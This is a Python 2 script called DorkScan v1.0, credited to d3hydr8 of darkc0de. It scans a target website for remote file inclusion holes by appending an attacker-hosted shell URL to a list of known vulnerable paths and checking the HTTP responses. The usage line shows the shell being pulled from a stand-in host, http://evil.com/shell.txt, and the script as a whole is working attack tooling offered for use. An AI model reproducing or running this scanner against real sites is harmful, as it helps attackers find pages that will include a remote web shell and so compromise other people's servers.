#!/usr/bin/python#DorkScan v1.0 takes a list of known RFI vuln. paths and#ch

1. #!/usr/bin/python
2. #DorkScan v1.0 takes a list of known RFI vuln. paths and
3. #checks the http response. I called it dorkscan because
4. #the list I use comes from a list of dorks.
5.  
6. #http://www.darkc0de.com
7. ##d3hydr8[at]gmail[dot]com
8.  
9. import sys, httplib, time, re
10.  
11. def getserv(path):
12.  
13. try:
14. h = httplib.HTTP(host)
15. h.putrequest("HEAD", path)
16. h.putheader("Host", host)
17. h.endheaders()
18. status, reason, headers = h.getreply()
19. except:
20. print "\n[-] Error: Name or service not known. Check your host.\n"
21. sys.exit(1)
22. return status, reason, headers.get("Server")
23.  
24. def timer():
25. now = time.localtime(time.time())
26. return time.asctime(now)
27.  
28. def title():
29. print "\n\t d3hydr8[at]gmail[dot]com DorkScan v1.0"
30. print "\t----------------------------------------------"
31.  
32. if len(sys.argv) != 4:
33. title()
34. print "\n\t[+] Usage: ./dorkscan.py <site> <list> <shell>\n"
35. print "\t[+] Option: -verbose"
36. print "\t[+] Ex. ./dorkscan.py example.com dorks.txt http://evil.com/shell.txt -verbose\n"
37. sys.exit(1)
38.  
39. title()
40. host = sys.argv[1]
41. lst = sys.argv[2]
42. shell = sys.argv[3]
43.  
44. for arg in sys.argv[1:]:
45. if arg.lower() == "-v" or arg.lower() == "-verbose":
46. verbose = 1
47. else:
48. verbose = 0
49.  
50. if host[:7] == "http://":
51. host = host.replace("http://","")
52. if host[-1] == "/":
53. host = host[:-1]
54.  
55. print "[+] Getting responses"
56. okresp,reason,server = getserv("/")
57. badresp = getserv("/d3hydr8.html")[:1]
58.  
59. if okresp == badresp[0]:
60. print "\n[-] Responses matched, try another host.\n"
61. sys.exit(1)
62. else:
63. print "\n[+] Target host:",host
64. print "[+] Target shell:",shell
65. print "[+] Target server:",server
66. print "[+] Target OK response:",okresp
67. print "[+] Target BAD response:",badresp[0], reason
68. print "[+] Scan Started at",timer()
69. if verbose ==1:
70. print "\n[+] Verbose Mode On"
71.  
72. try:
73. lines = open(lst, "r").readlines()
74. print "\n[+]",len(lines),"dorks loaded\n"
75. except(IOError):
76. print "[-] Error: Check your dorks list path\n"
77. sys.exit(1)
78.  
79. vulns = []
80. print "[+] Scanning...\n"
81. for line in lines:
82. if line[0] != "/":
83. line = "/"+line
84. status, reason = getserv(re.sub("\s","",line[:-1]+shell))[:2]
85. if verbose ==1:
86. print "[+]",status,reason,":",line[:-1],"\n"
87. if status == okresp:
88. vulns.append(line)
89. print "\t[!]",status,reason,":",line[:-1],"\n"
90. if status == int(401):
91. print "\t--",status,reason,":Needs Authentication [",line[:-1],"]\n"
92.  
93. if len(vulns) == 0:
94. print "[-] Couldn't find any vuln. paths\n"
95. else:
96. print "[!] Found",len(vulns),"possible vulnerabilities, check manually.\n"
97. for vuln in vulns:
98. print "\t[+] ",vuln
99. print "\n[+] Scan completed at", timer(),"\n"